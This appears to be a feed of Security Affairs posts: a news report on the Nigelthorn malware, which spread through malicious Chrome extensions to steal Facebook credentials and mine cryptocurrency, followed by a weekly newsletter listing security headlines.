The post Chili’s restaurant chain is the latest victim of a Payment Card Breach appeared first on Security Affairs.

Nigelthorn malware infected over 100,000 systems abusing Chrome extensions

The Nigelthorn malware has already infected over 100,000 systems in 100 countries by abusing a Google Chrome extension called Nigelify.

A new strain of malware, dubbed Nigelthorn because it abuses a Google Chrome extension called Nigelify, has already infected over 100,000 systems in 100 countries, with over 75% of the infections in the Philippines, Venezuela, and Ecuador.

The new malware family is capable of credential theft, cryptomining, click fraud, and other malicious activities.

According to the experts, the threat actor behind this campaign has been active since at least March 2018.

The Nigelthorn malware spreads through links on Facebook: victims are redirected to a fake YouTube page that asks them to install a Chrome extension to play the video. Once the victim accepts, the malicious extension is added to their browser.

“Radware has dubbed the malware “Nigelthorn” since the original Nigelify application replaces pictures to “Nigel Thornberry” and is responsible for a large portion of the observed infections.” reads the analysis published by Radware.

“The malware redirects victims to a fake YouTube page and asks the user to install a Chrome extension to play the video.”

The malware was specifically developed to target both Windows and Linux machines using the Chrome browser.

When a victim clicks “Add Extension”, they are redirected to a Bitly URL and from there to Facebook, where the attackers attempt to obtain the credentials for their account.

In order to bypass Google Application validation tools, the threat actors used copycat versions of legitimate extensions and injected a short, obfuscated malicious script into them.

“To date, Radware’s research group has observed seven of these malicious extensions, of which it appears four have been identified and blocked by Google’s security algorithms. Nigelify and PwnerLike remain active,” reads the analysis.

After the malicious extension is installed, a JavaScript payload is executed that starts the attack by downloading the malware configuration from the command and control (C&C) server, after which a set of requests is sent.

The Nigelthorn malware is able to steal Facebook login credentials and Instagram cookies. The malware also redirects users to a Facebook API to generate an access token that is then sent to the Command and Control servers.

The malware propagates using the stolen credentials: it sends the malicious link to the victim’s network either via Facebook Messenger messages or via a new post that tags up to 50 contacts.

The Nigelthorn malware also downloads a cryptomining tool to the victim’s computer.

“The attackers are using a publicly available browser-mining tool to get the infected machines to start mining cryptocurrencies.” states Radware. “The JavaScript code is downloaded from external sites that the group controls and contains the mining pool. Radware observed that in the last several days the group was trying to mine three different coins (Monero, Bytecoin and Electroneum) that are all based on the “CryptoNight” algorithm that allows mining via any CPU.”

The malicious code uses several techniques to maintain persistence on the infected system, such as closing the extensions tab if the user tries to open it, or downloading URI regexes from the C&C and using them to block access to Facebook and Chrome cleanup tools, and to stop the user from editing or deleting posts or posting comments.

Experts also described a YouTube fraud, the YouTube plugin is downloaded and executed, after which the malware attempts to access the URI “/php3/youtube.php” on the C&C to receive commands to watch, like, or comment on a video, or to subscribe to the page. These actions are likely an attempt to receive payments from YouTube.

“As this malware spreads, the group will continue to try to identify new ways to utilize the stolen assets. Such groups continuously create new malware and mutations to bypass security controls. Radware recommends individuals and organizations update their current password and only download applications from trusted sources,” concludes Radware.

Pierluigi Paganini

(Security Affairs – Nigelthorn malware, Facebook)

The post Nigelthorn malware infected over 100,000 systems abusing Chrome extensions appeared first on Security Affairs.

Security Affairs newsletter Round 162 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web”, is online, in Kindle and paper editions.

Once again thank you!

·      European Central Bank announced a framework for cyber attack simulation on financial firms
·      Google announces the open-source Asylo framework for confidential computing
·      New ZooPark APT targets Android users in Middle East since 2015
·      A new report sheds the lights on state-sponsored Chinese APTs under Winnti umbrella
·      Chrome freezes PC running Windows OS after Windows 10 April update
·      SynAck ransomware Employs Many Novel Techniques to Avoid Detection
·      Experts released an unofficial patch for Zero-Days in Dasan GPON home routers
·      Hackers continue to hack Drupal installs to install backdoors and inject cryptocurrency malware
·      Reading the 2017 Internet Crime Complaint Center (IC3) report
·      Secret Conversation – Twitter is testing End-to-End Encryption for direct messages
·      UPDATED – Critical RCE vulnerability found in over a million GPON Home Routers
·      Adobe fixed a Critical Code Execution issue in Flash Player
·      Are you using Python module ‘SSH Decorator? Newer versions include a backdoor
·      baseStriker attack technique allow to bypass Microsoft Office 365 anti-phishing filter
·      May 2018 Android Security Bulletin includes additional Meltdown fix
·      May 2018 Patch Tuesday: Microsoft fixes 2 zero-day flaws reportedly exploited by APT group
·      Signal disappearing messages can be recovered by the macOS client
·      Analysis of CVE-2018-8174 VBScript 0day and APT actor related to Office targeted attack
·      Lenovo releases updates to fix Secure Boot flaw in servers and other issues
·      Misinterpretation of Intel docs is the root cause for the CVE-2018-8897 flaw in Hypervisors and OSs
·      The source code of the TreasureHunter PoS Malware leaked online
·      Allanite threat actor focused on critical infrastructure is targeting electric utilities and ICS networks
·      Mining passwords from dozens of public Trello boards
·      Tech giant Telstra warns cloud customers they’re at risk of hack due to a SNAFU
·      Throwhammer, the new Rowhammer attack to remotely hack systems over the LAN
·      Google addresses critical security vulnerabilities in Chrome 66
·      iVideon Russian-based video surveillance solution leaked data, hundreds of thousands of records exposed
·      Wannacry outbreak anniversary: the EternalBlue exploit even more popular now

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 162 – News of the week appeared first on Security Affairs.